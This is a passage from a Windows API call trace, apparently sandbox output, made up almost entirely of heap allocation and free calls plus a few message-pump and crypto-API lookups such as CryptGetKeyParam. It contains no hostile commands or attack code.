hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0179.699] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0179.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0179.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0179.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0179.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0179.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.699] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0179.700] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0179.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0179.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0179.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0179.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0179.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0179.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0179.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0179.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0179.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0179.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0179.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.704] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0179.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0179.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.706] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0179.706] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c26f8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26f8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0179.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.708] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.708] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: 